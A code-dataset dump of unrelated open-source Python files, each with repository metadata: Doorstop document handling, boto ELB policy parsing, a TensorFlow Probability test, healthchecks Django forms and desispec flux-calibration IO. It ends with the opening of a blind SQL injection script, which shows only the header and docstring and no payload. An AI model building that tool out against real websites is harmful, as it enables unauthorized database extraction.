item = Item(path, root=self.root,
document=self, tree=self.tree)
except DoorstopError:
pass # skip non-item files
else:
self._items.append(item)
if reload:
item.load(reload=reload)
if settings.CACHE_ITEMS and self.tree:
self.tree._item_cache[item.uid] = item # pylint: disable=W0212
log.trace("cached item: {}".format(item))
# Set meta attributes
self._itered = True
# Yield items
yield from list(self._items)
# properties #############################################################
@property
def config(self):
"""Get the path to the document's file."""
return os.path.join(self.path, Document.CONFIG)
@property
@auto_load
def prefix(self):
"""Get the document's prefix."""
return self._data['prefix']
@prefix.setter
@auto_save
@auto_load
def prefix(self, value):
"""Set the document's prefix."""
self._data['prefix'] = Prefix(value)
# TODO: should the new prefix be applied to all items?
@property
@auto_load
def sep(self):
"""Get the prefix-number separator to use for new item UIDs."""
return self._data['sep']
@sep.setter
@auto_save
@auto_load
def sep(self, value):
"""Set the prefix-number separator to use for new item UIDs."""
# TODO: raise a specific exception for invalid separator characters?
assert not value or value in settings.SEP_CHARS
self._data['sep'] = value.strip()
# TODO: should the new separator be applied to all items?
@property
@auto_load
def digits(self):
"""Get the number of digits to use for new item UIDs."""
return self._data['digits']
@digits.setter
@auto_save
@auto_load
def digits(self, value):
"""Set the number of digits to use for new item UIDs."""
self._data['digits'] = value
# TODO: should the new digits be applied to all items?
@property
@auto_load
def parent(self):
"""Get the document's parent document prefix."""
return self._data['parent']
@parent.setter
@auto_save
@auto_load
def parent(self, value):
"""Set the document's parent document prefix."""
self._data['parent'] = str(value) if value else ""
@property
def items(self):
"""Get an ordered list of items in the document."""
return sorted(self._iter())
@property
def depth(self):
"""Return the maximum item level depth."""
return max(item.depth for item in self)
@property
def next_number(self):
"""Get the next item number for the document."""
try:
number = max(item.number for item in self) + 1
except ValueError:
number = 1
log.debug("next number (local): {}".format(number))
if self.tree and self.tree.request_next_number:
remote_number = 0
while remote_number is not None and remote_number < number:
if remote_number:
log.warn("server is behind, requesting next number...")
remote_number = self.tree.request_next_number(self.prefix)
log.debug("next number (remote): {}".format(remote_number))
if remote_number:
number = remote_number
return number
@property
def skip(self):
"""Indicate the document should be skipped."""
return os.path.isfile(os.path.join(self.path, Document.SKIP))
@property
def index(self):
"""Get the path to the document's index if it exists else `None`."""
path = os.path.join(self.path, Document.INDEX)
if os.path.exists(path):
return path
@index.setter
def index(self, value):
"""Create or update the document's index."""
if value:
path = os.path.join(self.path, Document.INDEX)
log.info("creating {} index...".format(self))
common.write_lines(self._lines_index(self.items), path)
@index.deleter
def index(self):
"""Delete the document's index if it exists."""
log.info("deleting {} index...".format(self))
common.delete(self.index)
# actions ################################################################
# decorators are applied to methods in the associated classes
def add_item(self, number=None, level=None, reorder=True):
"""Create a new item for the document and return it.
:param number: desired item number
:param level: desired item level
:param reorder: update levels of document items
:return: added :class:`~doorstop.core.item.Item`
"""
number = max(number or 0, self.next_number)
log.debug("next number: {}".format(number))
try:
last = self.items[-1]
except IndexError:
next_level = level
else:
if level:
next_level = level
elif last.level.heading:
next_level = last.level >> 1
next_level.heading = False
else:
next_level = last.level + 1
log.debug("next level: {}".format(next_level))
uid = UID(self.prefix, self.sep, number, self.digits)
item = Item.new(self.tree, self,
self.path, self.root, uid,
level=next_level)
if level and reorder:
self.reorder(keep=item)
return item
# decorators are applied to methods in the associated classes
def remove_item(self, value, reorder=True):
"""Remove an item by its UID.
:param value: item or UID
:param reorder: update levels of document items
:raises: :class:`~doorstop.common.DoorstopError` if the item
cannot be found
:return: removed :class:`~doorstop.core.item.Item`
"""
uid = UID(value)
item = self.find_item(uid)
item.delete()
if reorder:
self.reorder()
return item
# decorators are applied to methods in the associated classes
def reorder(self, manual=True, automatic=True, start=None, keep=None,
_items=None):
"""Reorder a document's items.
Two methods are using to create the outline order:
- manual: specify the order using an updated index file
- automatic: shift duplicate levels and compress gaps
:param manual: enable manual ordering using the index (if one exists)
:param automatic: enable automatic ordering (after manual ordering)
:param start: level to start numbering (None = use current start)
:param keep: item or UID to keep over duplicates
"""
# Reorder manually
if manual and self.index:
log.info("reordering {} from index...".format(self))
self._reorder_from_index(self, self.index)
del self.index
# Reorder automatically
if automatic:
log.info("reordering {} automatically...".format(self))
items = _items or self.items
keep = self.find_item(keep) if keep else None
self._reorder_automatic(items, start=start, keep=keep)
@staticmethod
def _lines_index(items):
"""Generate (pseudo) YAML lines for the document index."""
yield '#' * settings.MAX_LINE_LENGTH
yield '# THIS TEMPORARY FILE WILL BE DELETED AFTER DOCUMENT REORDERING'
yield '# MANUALLY INDENT, DEDENT, & MOVE ITEMS TO THEIR DESIRED LEVEL'
yield '# CHANGES ARE BE REFLECTED IN THE ITEM FILES AFTER CONFIRMATION'
yield '#' * settings.MAX_LINE_LENGTH
yield ''
yield "initial: {}".format(items[0].level if items else 1.0)
yield "outline:"
for item in items:
space = " " * item.depth
comment = item.text.replace('\n', ' ') or item.ref
line = space + "- {u}: # {c}".format(u=item.uid, c=comment)
if len(line) > settings.MAX_LINE_LENGTH:
line = line[:settings.MAX_LINE_LENGTH - 3] + '...'
yield line
@staticmethod
def _reorder_from_index(document, path):
"""Reorder a document's item from the index."""
# Load and parse index
text = common.read_text(path)
data = common.load_yaml(text, path)
# Read updated values
initial = data.get('initial', 1.0)
outline = data.get('outline', [])
# Update levels
level = Level(initial)
Document._reorder_section(outline, level, document)
@staticmethod
def _reorder_section(section, level, document):
"""Recursive function to reorder a section of an outline.
:param section: recursive `list` of `dict` loaded from document index
:param level: current :class:`~doorstop.core.types.Level`
:param document: :class:`~doorstop.core.document.Document` to order
"""
if isinstance(section, dict): # a section
# Get the item and subsection
uid = list(section.keys())[0]
try:
item = document.find_item(uid)
except DoorstopError as exc:
log.debug(exc)
item = None
subsection = section[uid]
# An item is a header if it has a subsection
level.heading = bool(subsection)
# Apply the new level
if item is None:
log.info("({}): {}".format(uid, level))
elif item.level == level:
log.info("{}: {}".format(item, level))
else:
log.info("{}: {} to {}".format(item, item.level, level))
if item:
item.level = level
# Process the heading's subsection
if subsection:
Document._reorder_section(subsection, level >> 1, document)
elif isinstance(section, list): # a list of sections
# Process each subsection
for index, subsection in enumerate(section):
Document._reorder_section(subsection, level + index, document)
@staticmethod
def _reorder_automatic(items, start=None, keep=None):
"""Reorder a document's items automatically.
:param items: items to reorder
:param start: level to start numbering (None = use current start)
:param keep: item to keep over duplicates
"""
nlevel = plevel = None
for clevel, item in Document._items_by_level(items, keep=keep):
log.debug("current level: {}".format(clevel))
# Determine the next level
if not nlevel:
# Use the specified or current starting level
nlevel = Level(start) if start else clevel
nlevel.heading = clevel.heading
log.debug("next level (start): {}".format(nlevel))
else:
# Adjust the next level to be the same depth
if len(clevel) > len(nlevel):
nlevel >>= len(clevel) - len(nlevel)
log.debug("matched current indent: {}".format(nlevel))
elif len(clevel) < len(nlevel):
nlevel <<= len(nlevel) - len(clevel)
# nlevel += 1
log.debug("matched current dedent: {}".format(nlevel))
nlevel.heading = clevel.heading
# Check for a level jump
_size = min(len(clevel.value), len(plevel.value))
for index in range(max(_size - 1, 1)):
if clevel.value[index] > plevel.value[index]:
nlevel <<= len(nlevel) - 1 - index
nlevel += 1
nlevel >>= len(clevel) - len(nlevel)
msg = "next level (jump): {}".format(nlevel)
log.debug(msg)
break
# Check for a normal increment
else:
if len(nlevel) <= len(plevel):
nlevel += 1
msg = "next level (increment): {}".format(nlevel)
log.debug(msg)
else:
msg = "next level (indent/dedent): {}".format(nlevel)
log.debug(msg)
# Apply the next level
if clevel == nlevel:
log.info("{}: {}".format(item, clevel))
else:
log.info("{}: {} to {}".format(item, clevel, nlevel))
item.level = nlevel.copy()
# Save the current level as the previous level
plevel = clevel.copy()
@staticmethod
def _items_by_level(items, keep=None):
"""Iterate through items by level with the kept item first."""
# Collect levels
levels = OrderedDict()
for item in items:
if item.level in levels:
levels[item.level].append(item)
else:
levels[item.level] = [item]
# Reorder levels
for level, items in levels.items():
# Reorder items at this level
if keep in items:
# move the kept item to the front of the list
log.debug("keeping {} level over duplicates".format(keep))
items = [items.pop(items.index(keep))] + items
for item in items:
yield level, item
def find_item(self, value, _kind=''):
"""Return an item by its UID.
:param value: item or UID
:raises: :class:`~doorstop.common.DoorstopError` if the item
cannot be found
:return: matching :class:`~doorstop.core.item.Item`
"""
uid = UID(value)
for item in self:
if item.uid == uid:
return item
raise DoorstopError("no matching{} UID: {}".format(_kind, uid))
def get_issues(self, item_hook=None, **kwargs):
"""Yield all the document's issues.
:param item_hook: function to call for custom item validation
:return: generator of :class:`~doorstop.common.DoorstopError`,
:class:`~doorstop.common.DoorstopWarning`,
:class:`~doorstop.common.DoorstopInfo`
"""
assert kwargs.get('document_hook') is None
hook = item_hook if item_hook else lambda **kwargs: []
log.info("checking document {}...".format(self))
# Check for items
items = self.items
if not items:
yield DoorstopWarning("no items")
return
# Reorder or check item levels
if settings.REORDER:
self.reorder(_items=items)
elif settings.CHECK_LEVELS:
yield from self._get_issues_level(items)
# Check each item
for item in items:
# Check item
for issue in chain(hook(item=item, document=self, tree=self.tree),
item.get_issues()):
# Prepend the item's UID to yielded exceptions
if isinstance(issue, Exception):
yield type(issue)("{}: {}".format(item.uid, issue))
@staticmethod
def _get_issues_level(items):
"""Yield all the document's issues related to item level."""
prev = items[0] if items else None
for item in items[1:]:
puid = prev.uid
plev = prev.level
nuid = item.uid
nlev = item.level
log.debug("checking level {} to {}...".format(plev, nlev))
# Duplicate level
if plev == nlev:
uids = sorted((puid, nuid))
msg = "duplicate level: {} ({}, {})".format(plev, *uids)
yield DoorstopWarning(msg)
# Skipped level
length = min(len(plev.value), len(nlev.value))
for index in range(length):
# Types of skipped levels:
# 1. over: 1.0 --> 1.2
# 2. out: 1.1 --> 3.0
if (nlev.value[index] - plev.value[index] > 1 or
# 3. over and out: 1.1 --> 2.2
(plev.value[index] != nlev.value[index] and
index + 1 < length and
nlev.value[index + 1] not in (0, 1))):
msg = "skipped level: {} ({}), {} ({})".format(plev, puid,
nlev, nuid)
yield DoorstopWarning(msg)
break
prev = item
@delete_document
def delete(self, path=None):
"""Delete the document and its items."""
for item in self:
item.delete()
# the document is deleted in the decorated method
| lgpl-3.0 | 291,275,080,082,622,800 | 36.121726 | 116 | 0.546156 | false | 4.42055 | true | false | false |
SaranyaKarthikeyan/boto | boto/ec2/elb/policies.py | 152 | 3856 | # Copyright (c) 2010 Reza Lotun http://reza.lotun.name
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.resultset import ResultSet
class AppCookieStickinessPolicy(object):
def __init__(self, connection=None):
self.cookie_name = None
self.policy_name = None
def __repr__(self):
return 'AppCookieStickiness(%s, %s)' % (self.policy_name,
self.cookie_name)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'CookieName':
self.cookie_name = value
elif name == 'PolicyName':
self.policy_name = value
class LBCookieStickinessPolicy(object):
def __init__(self, connection=None):
self.policy_name = None
self.cookie_expiration_period = None
def __repr__(self):
return 'LBCookieStickiness(%s, %s)' % (self.policy_name,
self.cookie_expiration_period)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'CookieExpirationPeriod':
self.cookie_expiration_period = value
elif name == 'PolicyName':
self.policy_name = value
class OtherPolicy(object):
def __init__(self, connection=None):
self.policy_name = None
def __repr__(self):
return 'OtherPolicy(%s)' % (self.policy_name)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
self.policy_name = value
class Policies(object):
"""
ELB Policies
"""
def __init__(self, connection=None):
self.connection = connection
self.app_cookie_stickiness_policies = None
self.lb_cookie_stickiness_policies = None
self.other_policies = None
def __repr__(self):
app = 'AppCookieStickiness%s' % self.app_cookie_stickiness_policies
lb = 'LBCookieStickiness%s' % self.lb_cookie_stickiness_policies
other = 'Other%s' % self.other_policies
return 'Policies(%s,%s,%s)' % (app, lb, other)
def startElement(self, name, attrs, connection):
if name == 'AppCookieStickinessPolicies':
rs = ResultSet([('member', AppCookieStickinessPolicy)])
self.app_cookie_stickiness_policies = rs
return rs
elif name == 'LBCookieStickinessPolicies':
rs = ResultSet([('member', LBCookieStickinessPolicy)])
self.lb_cookie_stickiness_policies = rs
return rs
elif name == 'OtherPolicies':
rs = ResultSet([('member', OtherPolicy)])
self.other_policies = rs
return rs
def endElement(self, name, value, connection):
return
| mit | 2,679,070,068,852,678,000 | 34.703704 | 77 | 0.643932 | false | 4.205016 | false | false | false |
tensorflow/probability | tensorflow_probability/python/experimental/auto_batching/tf_backend_test.py | 1 | 4331 | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the TF implementations of auto-batched VM variables."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import hypothesis as hp
from hypothesis import strategies as hps
from hypothesis.extra import numpy as hpnp
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.experimental.auto_batching import backend_test_lib as backend_test
from tensorflow_probability.python.experimental.auto_batching import instructions as inst
from tensorflow_probability.python.experimental.auto_batching import tf_backend
from tensorflow_probability.python.internal import hypothesis_testlib as tfp_hps
from tensorflow_probability.python.internal import test_util
# TODO(b/127689162): Restore testing complex dtypes.
# TF_NP_DTYPES = [np.float32, np.float64, np.int32, np.complex64, np.bool_]
TF_NP_DTYPES = [np.float32, np.float64, np.int32, np.bool_]
TF_BACKEND = tf_backend.TensorFlowBackend()
def var_init(max_stack_depth, initial_value):
type_ = inst.TensorType(initial_value.dtype, initial_value.shape[1:])
var = TF_BACKEND.create_variable(
None, inst.VariableAllocation.FULL, type_,
max_stack_depth, batch_size=initial_value.shape[0])
return var.update(
initial_value, TF_BACKEND.full_mask(initial_value.shape[0]))
@test_util.test_all_tf_execution_regimes
class TFVariableTest(test_util.TestCase, backend_test.VariableTestCase):
def testTFSmoke(self):
"""Test the property on specific example, without relying on Hypothesis."""
init = (12, np.random.randn(3, 2, 2).astype(np.float32))
ops = [('pop', [False, False, True]),
('push', [True, False, True]),
('update', np.ones((3, 2, 2), dtype=np.float32),
[True, True, False]),
('pop', [True, False, True])]
self.check_same_results(
init, ops, var_init, to_numpy_arrays=self.evaluate,
exception_types=(ValueError, tf.errors.InvalidArgumentError))
@hp.given(hps.data())
@tfp_hps.tfp_hp_settings()
def testTFVariableRandomOps(self, data):
# Hypothesis strategy:
# Generate a random max stack depth and value shape
# Deduce the batch size from the value shape
# Make a random dtype
# Generate a random initial value of that dtype and shape
# Generate ops, some of which write random values of that dtype and shape
max_stack_depth = data.draw(hps.integers(min_value=1, max_value=100))
value_shape = data.draw(hpnp.array_shapes(min_dims=1))
batch_size = value_shape[0]
dtype = data.draw(hps.one_of(*map(hps.just, TF_NP_DTYPES)))
masks = hpnp.arrays(dtype=np.bool_, shape=[batch_size])
values = hpnp.arrays(dtype, value_shape)
init_val = data.draw(values)
ops = data.draw(
hps.lists(
hps.one_of(
hps.tuples(hps.just('update'), values, masks),
hps.tuples(hps.just('push'), masks),
hps.tuples(hps.just('pop'), masks), # preserve line break
hps.tuples(hps.just('read')))))
init = (max_stack_depth, init_val)
self.check_same_results(
init, ops, var_init, to_numpy_arrays=self.evaluate,
exception_types=(ValueError, tf.errors.InvalidArgumentError))
def testClosingOverTensorDoesntRaise(self):
x = tf.constant(0.)
def f(y):
return y * x
arg_types = [inst.Type([inst.TensorType(shape=[], dtype=np.float32)])]
TF_BACKEND.run_on_dummies(f, arg_types)
def testDtypeMergingBoolsDoesntRaise(self):
TF_BACKEND.merge_dtypes(np.bool_, np.bool_)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 8,641,079,420,912,624,000 | 39.476636 | 101 | 0.688294 | false | 3.55 | true | false | false |
iphoting/healthchecks | hc/front/forms.py | 1 | 8776 | from datetime import timedelta as td
import json
import re
from urllib.parse import quote, urlencode
from django import forms
from django.forms import URLField
from django.conf import settings
from django.core.exceptions import ValidationError
from hc.front.validators import (
CronExpressionValidator,
TimezoneValidator,
WebhookValidator,
)
import requests
class HeadersField(forms.Field):
message = """Use "Header-Name: value" pairs, one per line."""
def to_python(self, value):
if not value:
return {}
headers = {}
for line in value.split("\n"):
if not line.strip():
continue
if ":" not in line:
raise ValidationError(self.message)
n, v = line.split(":", maxsplit=1)
n, v = n.strip(), v.strip()
if not n or not v:
raise ValidationError(message=self.message)
headers[n] = v
return headers
def validate(self, value):
super().validate(value)
for k, v in value.items():
if len(k) > 1000 or len(v) > 1000:
raise ValidationError("Value too long")
class NameTagsForm(forms.Form):
name = forms.CharField(max_length=100, required=False)
tags = forms.CharField(max_length=500, required=False)
desc = forms.CharField(required=False)
def clean_tags(self):
result = []
for part in self.cleaned_data["tags"].split(" "):
part = part.strip()
if part != "":
result.append(part)
return " ".join(result)
class FilteringRulesForm(forms.Form):
filter_by_subject = forms.ChoiceField(choices=(("no", "no"), ("yes", "yes")))
subject = forms.CharField(required=False, max_length=100)
subject_fail = forms.CharField(required=False, max_length=100)
methods = forms.ChoiceField(required=False, choices=(("", "Any"), ("POST", "POST")))
manual_resume = forms.BooleanField(required=False)
def clean_subject(self):
if self.cleaned_data["filter_by_subject"] == "yes":
return self.cleaned_data["subject"]
return ""
def clean_subject_fail(self):
if self.cleaned_data["filter_by_subject"] == "yes":
return self.cleaned_data["subject_fail"]
return ""
class TimeoutForm(forms.Form):
timeout = forms.IntegerField(min_value=60, max_value=2592000)
grace = forms.IntegerField(min_value=60, max_value=2592000)
def clean_timeout(self):
return td(seconds=self.cleaned_data["timeout"])
def clean_grace(self):
return td(seconds=self.cleaned_data["grace"])
class CronForm(forms.Form):
schedule = forms.CharField(max_length=100, validators=[CronExpressionValidator()])
tz = forms.CharField(max_length=36, validators=[TimezoneValidator()])
grace = forms.IntegerField(min_value=1, max_value=43200)
class AddOpsgenieForm(forms.Form):
error_css_class = "has-error"
region = forms.ChoiceField(initial="us", choices=(("us", "US"), ("eu", "EU")))
key = forms.CharField(max_length=40)
PRIO_CHOICES = [
("-2", "Lowest Priority"),
("-1", "Low Priority"),
("0", "Normal Priority"),
("1", "High Priority"),
("2", "Emergency Priority"),
]
class AddPushoverForm(forms.Form):
error_css_class = "has-error"
pushover_user_key = forms.CharField()
prio = forms.ChoiceField(initial="0", choices=PRIO_CHOICES)
prio_up = forms.ChoiceField(initial="0", choices=PRIO_CHOICES)
def get_value(self):
key = self.cleaned_data["pushover_user_key"]
prio = self.cleaned_data["prio"]
prio_up = self.cleaned_data["prio_up"]
return "%s|%s|%s" % (key, prio, prio_up)
class AddEmailForm(forms.Form):
error_css_class = "has-error"
value = forms.EmailField(max_length=100)
down = forms.BooleanField(required=False, initial=True)
up = forms.BooleanField(required=False, initial=True)
def clean(self):
super().clean()
down = self.cleaned_data.get("down")
up = self.cleaned_data.get("up")
if not down and not up:
self.add_error("down", "Please select at least one.")
class AddUrlForm(forms.Form):
error_css_class = "has-error"
value = forms.URLField(max_length=1000, validators=[WebhookValidator()])
METHODS = ("GET", "POST", "PUT")
class WebhookForm(forms.Form):
error_css_class = "has-error"
name = forms.CharField(max_length=100, required=False)
method_down = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS))
body_down = forms.CharField(max_length=1000, required=False)
headers_down = HeadersField(required=False)
url_down = URLField(
max_length=1000, required=False, validators=[WebhookValidator()]
)
method_up = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS))
body_up = forms.CharField(max_length=1000, required=False)
headers_up = HeadersField(required=False)
url_up = forms.URLField(
max_length=1000, required=False, validators=[WebhookValidator()]
)
def clean(self):
super().clean()
url_down = self.cleaned_data.get("url_down")
url_up = self.cleaned_data.get("url_up")
if not url_down and not url_up:
if not self.has_error("url_down"):
self.add_error("url_down", "Enter a valid URL.")
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
class AddShellForm(forms.Form):
error_css_class = "has-error"
cmd_down = forms.CharField(max_length=1000, required=False)
cmd_up = forms.CharField(max_length=1000, required=False)
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
class PhoneNumberForm(forms.Form):
error_css_class = "has-error"
label = forms.CharField(max_length=100, required=False)
phone = forms.CharField()
def clean_phone(self):
v = self.cleaned_data["phone"]
stripped = v.encode("ascii", "ignore").decode("ascii")
stripped = stripped.replace(" ", "").replace("-", "")
if not re.match(r"^\+\d{5,15}$", stripped):
raise forms.ValidationError("Invalid phone number format.")
return stripped
def get_json(self):
return json.dumps({"value": self.cleaned_data["phone"]})
class PhoneUpDownForm(PhoneNumberForm):
up = forms.BooleanField(required=False, initial=True)
down = forms.BooleanField(required=False, initial=True)
def get_json(self):
return json.dumps(
{
"value": self.cleaned_data["phone"],
"up": self.cleaned_data["up"],
"down": self.cleaned_data["down"],
}
)
class ChannelNameForm(forms.Form):
name = forms.CharField(max_length=100, required=False)
class AddMatrixForm(forms.Form):
error_css_class = "has-error"
alias = forms.CharField(max_length=100)
def clean_alias(self):
v = self.cleaned_data["alias"]
# validate it by trying to join
url = settings.MATRIX_HOMESERVER
url += "/_matrix/client/r0/join/%s?" % quote(v)
url += urlencode({"access_token": settings.MATRIX_ACCESS_TOKEN})
r = requests.post(url, {})
if r.status_code == 429:
raise forms.ValidationError(
"Matrix server returned status code 429 (Too Many Requests), "
"please try again later."
)
doc = r.json()
if "error" in doc:
raise forms.ValidationError("Response from Matrix: %s" % doc["error"])
self.cleaned_data["room_id"] = doc["room_id"]
return v
class AddAppriseForm(forms.Form):
error_css_class = "has-error"
url = forms.CharField(max_length=512)
class AddPdForm(forms.Form):
error_css_class = "has-error"
value = forms.CharField(max_length=32)
ZULIP_TARGETS = (("stream", "Stream"), ("private", "Private"))
class AddZulipForm(forms.Form):
error_css_class = "has-error"
bot_email = forms.EmailField(max_length=100)
api_key = forms.CharField(max_length=50)
site = forms.URLField(max_length=100, validators=[WebhookValidator()])
mtype = forms.ChoiceField(choices=ZULIP_TARGETS)
to = forms.CharField(max_length=100)
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
class AddTrelloForm(forms.Form):
token = forms.RegexField(regex=r"^[0-9a-fA-F]{64}$")
board_name = forms.CharField(max_length=100)
list_name = forms.CharField(max_length=100)
list_id = forms.RegexField(regex=r"^[0-9a-fA-F]{16,32}$")
def get_value(self):
return json.dumps(dict(self.cleaned_data), sort_keys=True)
| bsd-3-clause | 5,900,701,289,062,930,000 | 29.054795 | 88 | 0.62876 | false | 3.611523 | false | false | false |
gdhungana/desispec | py/desispec/io/fluxcalibration.py | 2 | 5653 | """
desispec.io.fluxcalibration
===========================
IO routines for flux calibration.
"""
from __future__ import absolute_import, print_function
import os
from astropy.io import fits
import numpy,scipy
from desiutil.depend import add_dependencies
from .util import fitsheader, native_endian, makepath
def write_stdstar_models(norm_modelfile,normalizedFlux,wave,fibers,data,header=None):
"""Writes the normalized flux for the best models.
Args:
norm_modelfile : output file path
normalizedFlux : 2D array of flux[nstdstars, nwave]
wave : 1D array of wavelengths[nwave] in Angstroms
fibers : 1D array of fiberids for these spectra
data : meta data table about which templates best fit; should include
BESTMODEL, TEMPLATEID, CHI2DOF, REDSHIFT
"""
hdr = fitsheader(header)
add_dependencies(hdr)
hdr['EXTNAME'] = ('FLUX', 'erg/s/cm2/A')
hdr['BUNIT'] = ('erg/s/cm2/A', 'Flux units')
hdu1=fits.PrimaryHDU(normalizedFlux.astype('f4'), header=hdr.copy())
hdr['EXTNAME'] = ('WAVELENGTH', '[Angstroms]')
hdr['BUNIT'] = ('Angstrom', 'Wavelength units')
hdu2 = fits.ImageHDU(wave.astype('f4'), header=hdr.copy())
hdr['EXTNAME'] = ('FIBERS', 'no dimension')
hdu3 = fits.ImageHDU(fibers, header=hdr.copy())
hdr['EXTNAME'] = ('METADATA', 'no dimension')
from astropy.io.fits import Column
BESTMODEL=Column(name='BESTMODEL',format='K',array=data['BESTMODEL'])
TEMPLATEID=Column(name='TEMPLATEID',format='K',array=data['TEMPLATEID'])
CHI2DOF=Column(name='CHI2DOF',format='D',array=data['CHI2DOF'])
REDSHIFT=Column(name='REDSHIFT',format='D',array=data['REDSHIFT'])
cols=fits.ColDefs([BESTMODEL,TEMPLATEID,CHI2DOF,REDSHIFT])
tbhdu=fits.BinTableHDU.from_columns(cols,header=hdr)
hdulist=fits.HDUList([hdu1,hdu2,hdu3,tbhdu])
tmpfile = norm_modelfile+".tmp"
hdulist.writeto(tmpfile, clobber=True, checksum=True)
os.rename(tmpfile, norm_modelfile)
#fits.append(norm_modelfile,cols,header=tbhdu.header)
def read_stdstar_models(filename):
"""Read stdstar models from filename.
Args:
filename (str): File containing standard star models.
Returns:
read_stdstar_models (tuple): flux[nspec, nwave], wave[nwave], fibers[nspec]
"""
with fits.open(filename, memmap=False) as fx:
flux = native_endian(fx['FLUX'].data.astype('f8'))
wave = native_endian(fx['WAVELENGTH'].data.astype('f8'))
fibers = native_endian(fx['FIBERS'].data)
return flux, wave, fibers
def write_flux_calibration(outfile, fluxcalib, header=None):
"""Writes flux calibration.
Args:
outfile : output file name
fluxcalib : FluxCalib object
Options:
header : dict-like object of key/value pairs to include in header
"""
hx = fits.HDUList()
hdr = fitsheader(header)
add_dependencies(hdr)
hdr['EXTNAME'] = 'FLUXCALIB'
hdr['BUNIT'] = ('(electrons/A) / (erg/s/cm2/A)', 'electrons per flux unit')
hx.append( fits.PrimaryHDU(fluxcalib.calib.astype('f4'), header=hdr) )
hx.append( fits.ImageHDU(fluxcalib.ivar.astype('f4'), name='IVAR') )
hx.append( fits.CompImageHDU(fluxcalib.mask, name='MASK') )
hx.append( fits.ImageHDU(fluxcalib.wave, name='WAVELENGTH') )
hx.writeto(outfile+'.tmp', clobber=True, checksum=True)
os.rename(outfile+'.tmp', outfile)
return outfile
def read_flux_calibration(filename):
"""Read flux calibration file; returns a FluxCalib object
"""
# Avoid a circular import conflict at package install/build_sphinx time.
from ..fluxcalibration import FluxCalib
fx = fits.open(filename, memmap=False, uint=True)
calib = native_endian(fx[0].data.astype('f8'))
ivar = native_endian(fx["IVAR"].data.astype('f8'))
mask = native_endian(fx["MASK"].data)
wave = native_endian(fx["WAVELENGTH"].data.astype('f8'))
fluxcalib = FluxCalib(wave, calib, ivar, mask)
fluxcalib.header = fx[0].header
fx.close()
return fluxcalib
def read_stdstar_templates(stellarmodelfile):
"""
Reads an input stellar model file
Args:
stellarmodelfile : input filename
Returns (wave, flux, templateid, teff, logg, feh) tuple:
wave : 1D[nwave] array of wavelengths [Angstroms]
flux : 2D[nmodel, nwave] array of model fluxes
templateid : 1D[nmodel] array of template IDs for each spectrum
teff : 1D[nmodel] array of effective temperature for each model
logg : 1D[nmodel] array of surface gravity for each model
feh : 1D[nmodel] array of metallicity for each model
"""
phdu=fits.open(stellarmodelfile, memmap=False)
#- New templates have wavelength in HDU 2
if len(phdu) >= 3:
wavebins = native_endian(phdu[2].data)
#- Old templates define wavelength grid in HDU 0 keywords
else:
hdr0=phdu[0].header
crpix1=hdr0['CRPIX1']
crval1=hdr0['CRVAL1']
cdelt1=hdr0['CDELT1']
if hdr0["LOGLAM"]==1: #log bins
wavebins=10**(crval1+cdelt1*numpy.arange(len(phdu[0].data[0])))
else: #lin bins
model_wave_step = cdelt1
model_wave_offset = (crval1-cdelt1*(crpix1-1))
wavebins=model_wave_step*numpy.arange(n_model_wave) + model_wave_offset
paramData=phdu[1].data
templateid=paramData["TEMPLATEID"]
teff=paramData["TEFF"]
logg=paramData["LOGG"]
feh=paramData["FEH"]
fluxData=native_endian(phdu[0].data)
phdu.close()
return wavebins,fluxData,templateid,teff,logg,feh
| bsd-3-clause | -3,059,710,040,801,416,000 | 34.553459 | 85 | 0.656112 | false | 3.248851 | false | false | false |
the-useless-one/blind_injection | injection.py | 1 | 2562 | #!/usr/bin/env python3
#
# -*- coding: utf8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2014 Yannick Méheut <useless (at) utouch (dot) fr>
import sys
import requests
def injection(target_url, string, column, table, where, index):
'''
This function will be performing the injection. It will find each
character, bit by bit.
* target_url: the URL where the injection will be performed
* string: the string we'll look for for the binary search outcome
The function will return the found password.
'''
print('[wait] retrieving data:', end='\t')
